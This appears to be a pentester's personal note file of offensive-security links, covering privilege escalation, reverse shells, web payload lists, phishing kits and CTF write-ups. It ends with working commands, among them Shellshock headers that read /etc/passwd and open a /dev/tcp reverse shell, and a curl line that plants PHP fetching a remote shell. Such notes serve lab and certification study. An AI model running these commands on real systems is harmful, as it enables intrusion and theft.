Hacking links
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - (linpeas.sh)
- https://github.com/mzet-/linux-exploit-suggester - (linux exploit suggester)
- https://github.com/saghul/lxd-alpine-builder.git - (LXD Alpine Linux image builder)
- https://github.com/pentestmonkey/windows-privesc-check - (windows-privesc-check)
- https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123 - (Linux Privilege Escalation Check Script[as linpeas])
- https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs - (dirtycow)
- https://github.com/Anon-Exploiter/SUID3NUM - ([finds weak points]alternative to find command — find / -perm -u=s -type f 2>/dev/null)
- https://github.com/DominicBreuker/pspy - (search for cron jobs, crontab, weak points..[pspy64 — binary executable file])
- https://gtfobins.github.io - (shell, sudo, file read.. etc)
- https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/privilege-escalation/linux/linux-examples.rst - (privilege escalation cheat sheet)
- https://book.hacktricks.xyz/linux-unix/privilege-escalation - (Linux Privilege Escalation)
- https://pentestlab.blog/category/privilege-escalation/ - (find command)(privilege escalation)
- https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs (scheduled-cron-jobs)
- https://www.hackingarticles.in/lxd-privilege-escalation/ - (lxd-privilege-escalation)
- https://github.com/pentestmonkey/php-reverse-shell - (php reverse shell (pentest monkey))
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - (ALL Reverse Shell Cheatsheet)
- https://www.revshells.com/ - (create reverse shells by giving ip and port)
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - (pentestmonkey reverse shell cheat sheet)
- https://highon.coffee/blog/reverse-shell-cheat-sheet/ - (reverse shell cheat sheet)
- https://github.com/payloadbox/xss-payload-list - (xss-payload-list)
- https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md - (xss-reflected-steal-cookie)
- https://owasp.org/www-community/xss-filter-evasion-cheatsheet - (xss-filter-evasion-cheatsheet)
- https://www.google.com/intl/sw/about/appsecurity/learning/xss/
- https://github.com/qazbnm456/awesome-web-security#xss---cross-site-scripting - (cross-site-scripting)
- https://github.com/s0md3v/AwesomeXSS - (cross-site-scripting)
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection/Intruder - (sql injection cheat sheet)
- https://github.com/payloadbox/sql-injection-payload-list - (sql injection cheat sheet)
- https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet - (sqlmap cheat sheet)
- https://github.com/radareorg/radare2 - (reverse engineering)(assembly code)
- https://scoding.de/uploads/r2_cs.pdf - (reverse engineering cheat sheet)
- https://cplusperks.com/narnia/#level7 - (gdb, radare2, usage)
- https://github.com/NationalSecurityAgency/ghidra - (ghidra source code, download ghidra from website)
- https://ghidra-sre.org/ - (ghidra)
- https://ghidra-sre.org/CheatSheet.html - (ghidra cheat sheet)
- https://github.com/Maijin/radare2-workshop-2015/tree/master/IOLI-crackme/bin-win32 - (radare2 applications for practice)
- https://radare.gitbooks.io/radare2book/content/analysis/code_analysis.html - (Radare2 code analysis)
- https://github.com/qazbnm456/awesome-security-trivia/blob/master/Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md - (lfi-cheat-sheet)
- https://highon.coffee/blog/lfi-cheat-sheet/ - (lfi-cheat-sheet)(phpfilter)
- https://github.com/payloadbox/rfi-lfi-payload-list - (rfi-lfi-payload-list)
- https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-2-rce - (lfi - local file inclusion)
- https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst - (buffer overflows programs and procedure)
- https://tcm-sec.com/buffer-overflows-made-easy/ - (buffer overflows writeup)
- https://tryhackme.com/room/bufferoverflowprep - [for practice]
- https://www.tzero86bits.tk/posts/overflow_prep/#task-1---oscpexe---overflow1
- https://www.trenchesofit.com/2020/09/12/oscp-buffer-overflow-write-up/
- https://cd6629.gitbook.io/oscp-notes/buffer-overflow-wlk/buffer-overflow-prep
Buffer Overflow Videos:
- https://github.com/carlospolop/PayloadsAllTheThings - (PayloadsAllTheThings)
- https://github.com/swisskyrepo/PayloadsAllTheThings - (All kinds of payloads, like seclists)
- https://github.com/payloadbox - (all payloads, like lfi,command,xss..etc)
- https://github.com/GohEeEn/CTF-and-Computer-Security-Tools - (All tools with their links)
- https://gchq.github.io/CyberChef/
- https://crackstation.net/
- https://www.base64decode.org/
- https://morsecode.world/international/decoder/audio-decoder-adaptive.html - (morsecode decoder)
- https://www.boxentriq.com/code-breaking/cipher-identifier - (extract Ciphertext, with or without key)
- https://md5decrypt.net/en/#answer - (Md5 Encrypt & Decrypt)
- https://hashes.com/en/decrypt/hash - (Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes)
- https://codebeautify.org/ - (all converters, like cyberchef)
- https://codebeautify.org/string-hex-converter - (string-hex-converter)
- http://forum.codecall.net/topic/48889-c-tutorial-xor-encryption/ - (XOR Encryption [decrypt the files])
- https://www.guballa.de/vigenere-solver - (Vigenere cipher brute-force cracker, also works if the cipher is in a different language like German, etc.)
- https://hashcat.net/wiki/doku.php?id=example_hashes - (all Generic hash types for hashcat)
- https://www.dcode.fr/
- https://github.com/s-h-3-l-l/katoolin3 - (katoolin3)
- https://github.com/swisskyrepo/Wordpresscan - (wordpress scan)
- https://github.com/guelfoweb/knock - (subdomain scan)
- https://github.com/aboul3la/Sublist3r - (subdomain, domain, port scanner)
- https://github.com/s0md3v/Striker - (scans, see github documentation)
- https://github.com/Tib3rius/AutoRecon - (AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services)
- https://github.com/Tib3rius/revshellgen - (generate reverse shell of all types)
- https://github.com/lxd-images/alpine-3-7-apache-php5-6 - (lxd images)
- https://github.com/RustScan/RustScan - (RustScan - same as nmap scan)
- https://github.com/ropnop/kerbrute/releases - (kerbrute)
- https://github.com/SecureAuthCorp/impacket.git - (or apt install impacket )
- https://github.com/calebstewart/pwncat - (pwncat, same as netcat [nc])
- https://github.com/guelfoweb/knock - (enumerate subdomains)
- https://github.com/ffuf/ffuf - (same as wfuzz, gobuster)
- https://github.com/guelfoweb/wpbrute - (Wordpress user enumeration and password bruteforce)
- https://github.com/BC-SECURITY/Empire/ - (Empire 3 is a post-exploitation framework)
- https://github.com/nahamsec/lazyrecon
- https://github.com/xmendez/wfuzz
- https://github.com/infosec-au/altdns
- https://www.tenable.com/products/nessus/nessus-essentials - (nessus download)
- https://ghidra-sre.org/ (ghidra)
- https://github.com/DarkSecDevelopers/HiddenEye-Legacy - (phishing link)
- https://github.com/trustedsec/social-engineer-toolkit - (social-engineer-toolkit)
- https://github.com/An0nUD4Y/blackeye - (phishing)
- https://zsecurity.org/hiddeneye-with-ngrok-all-in-one-phishing-solution/ - (phishing)
- https://owasp.org/
- https://www.exploit-db.com/
- https://www.exploit-db.com/google-hacking-database
- https://osintframework.com/ (enumerations)
- https://www.sevenlayers.com/index.php/125-exploiting-shellshock - (shellshock vulnerability)
- https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ - (wildcard-for-privilege-escalation, tar..etc)
- https://github.com/saleemrashid/sudo-cve-2019-18634 - (cve-2019-18634)
- https://www.exploit-db.com/exploits/1518 - (MySQL 4.x/5.0 (Linux))
- https://www.exploit-db.com/exploits/37292 - (Linux Kernel 3.13.0 < 3.19)
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/
- https://www.hacksplaining.com/ - (learn basic hacking)
- https://www.vulnhub.com/
- https://pentesterlab.com/exercises
- https://portswigger.net/web-security
- https://www.pentesteracademy.com/topics
- https://blueteamlabs.online/home - blto(cyber blue)
- https://elearnsecurity.com/product/ejpt-certification/ - elearnsecurity
- https://my.ine.com/area/ff0cb823-5bec-4b3a-b096-415dcf6c0adb - ine.com
- https://academy.tcm-sec.com/ - tcm-sec
- https://tryhackme.com/ - tryhackme
- https://www.hackthebox.eu/ - hackthebox
- https://securityblue.team/ - cyber blue
- https://ctf.hacker101.com/ctf - hacker101 ctf
- https://medium.com/@sparshjazz/how-to-learn-hacking-my-path-692fccd42d56
- https://tcm-sec.com/so-you-want-to-be-a-hacker-2021-edition/ - (how to become a hacker)
- https://blog.tryhackme.com/going-from-zero-to-hero/ - (Guide to go from Zero to Hero)
- https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ - (penetration-testing-tools-cheat-sheet and method)
- https://github.com/GohEeEn/CTF-and-Computer-Security-Tools - (All tools in one link)
- https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters (bug bounty resources)
- https://highon.coffee/
- https://book.hacktricks.xyz/
- https://linuxize.com/
- https://neverendingsecurity.wordpress.com/
- https://muirlandoracle.co.uk/ (hacking articles, all write ups)
- https://www.hackingarticles.in/ (hacking articles, all write ups)
- https://pwn.by/noraj/
- https://writeup.raw.pm/
- https://blog.raw.pm/
- https://apjone.uk/
- https://github.com/JohnHammond/ctf-katana - (tools required for CTF..)
- https://github.com/mzet-/ctf-writeups - (some writeups)
- https://muirlandoracle.co.uk/ - (write ups)
- https://www.hackingarticles.in/ - (hacking articles, usage)
- https://github.com/josh-a-miller/ctf - (Tryhackme and hackthebox writeups)
- https://github.com/sagishahar/lpeworkshop - (walkthrough pdf)
- https://github.com/mzfr/vulnhub-writeups - (vulnhub writeups)
- https://github.com/VulnHub/ctf-writeups - (VulnHub ctf writeups)
- https://github.com/GohEeEn/TryHackMe-Write-Up - (TryHackMe Write Up)
- https://github.com/testerting/hacker101-ctf/tree/master/micro-cms_v2/flag2 - (hacker101 ctf)
- https://blog.fruxlabs.com/hacker101-ctf-solutions/ - (hacker101 ctf)
- https://github.com/sebastiendamaye/TryHackMe - (tryhackme writeups)
- https://noxtal.com/writeups/2020/07/11/tryhackme-koth-lion/ - (writeup for tryhackme-koth-lion)
- https://hackingresources.com/category/ctf-writeups/vulnhub-writeups/ - (vulnhub-writeups)
- https://www.aldeid.com/wiki/Category:CTF - (aldeid all ctf tryhackme, hackthebox, vulnhub)
- https://gitlab.com/ctf-and-walkthrough-writeups/tryhackme
- https://github.com/noraj/tryhackme-writeups
- https://infosecwriteups.com/tagged/vulnhub
- https://github.com/Ignitetechnologies/Vulnhub-CTF-Writeups
- https://www.vulnhub.com/resources/
- https://zime64.gitlab.io/writeups/
- https://github.com/payloadbox/command-injection-payload-list - (command-injection-payload-list)
- https://github.com/internetwache/GitTools - (git extractor (eg: .git))
- https://github.com/icsharpcode/ILSpy - (to see source code of applications)
- https://github.com/NinjaJc01/ssh-backdoor - (ssh backdoor)
- https://github.com/qazbnm456/awesome-web-security - (some cheat sheets and other links)
- https://github.com/Tib3rius/Pentest-Cheatsheets - (Pentest-Cheatsheets)
- https://github.com/JohnHammond/poor-mans-pentest - (reverse shells in bash scripts)
- https://github.com/carlospolop/hacktricks - (hacking tricks)
- https://github.com/carlospolop/pwntools-tutorial - (pwntools-tutorial [go through])
- https://github.com/payloadbox/xxe-injection-payload-list - (xxe-injection-payload-list, xml)
- https://github.com/carlospolop/hacktricks - (hacking trick/technique)
- https://wiki.skullsecurity.org/Passwords (list of all passwords)
- https://www.openvas.org/
- https://www.rapid7.com/products/nexpose/
- https://www.tenable.com/products/nessus
Steganography:
1) Steghide
2) Exiftool
3) Binwalk
4) StegoSuite
5) Zsteg
6) Sonic Visualiser
7) Stegoveritas
Directory Scanner Tools:
1) Dirb
2) GoBuster
3) Wfuzz
4) DirBuster
- https://github.com/whoisflynn/OSCP-Exam-Report-Template - (Exam Report Template)
- https://github.com/noraj/OSCP-Exam-Report-Template-Markdown - (OSCP-Exam-Report-Template-Markdown)
- https://www.notion.so/OSCP-Exam-Notes-EXAM_DATE-cb9d15436e4849339aaa35979d582735 - (OSCP Exam Notes)
- https://github.com/JohnHammond/oscp-notetaking - (oscp note taking)
- https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom - (How-to-use-msfvenom)
- https://www.aircrack-ng.org/doku.php?id=airmon-ng - (airmon-ng usage)
- https://dashboard.ngrok.com/get-started/setup - (ngrok download and setup)
- http://irtfweb.ifa.hawaii.edu/~lockhart/gpg/ - (gpg cheatsheet)
[find, curl, sed, grep, scp, wfuzz, docker]
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -u=s 2>/dev/null
find / -user archangel 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -newermt "2021-02-15 19:00:00" ! -newermt "2021-02-16 20:00:00" -ls 2>/dev/null
find / -name flag.txt -type f 2>/dev/null
find / -user root -perm -4000 -executable -type f 2>/dev/null
sed -n 148p /home/santa/naughty_list.txt (read only the contents of line 148)
sed (used to replace a string with another string or character)
grep -i 'thm{.*}' *
grep -r mission * .[^.]* 2>/dev/null
curl -A "<?php file_put_contents('shell.php', file_get_contents('http://10.8.94.78:8080/shell.php')); ?>" -s http://10.10.148.69 (send the file to another IP address or upload a file to the website using curl)
scp gherkin@10.10.251.122:/home/gherkin/cmd_service.py . (get files from other system through ssh)
docker -H 10.10.171.188:2375 run -v /:/mnt --rm -it frontend chroot /mnt sh (take shell from docker)
git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.10.155.108//cgi-bin/test.cgi
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.8.94.78/4242 0>&1' http://10.10.195.105/cgi-bin/test.cgi
scp index.html alex@10.10.101.79:/home/alex (to put files onto another machine)[use * in place of index.html to upload all files in that folder]
scp alex@10.10.101.79:/home/alex . (to download files from another machine)[. means into this folder]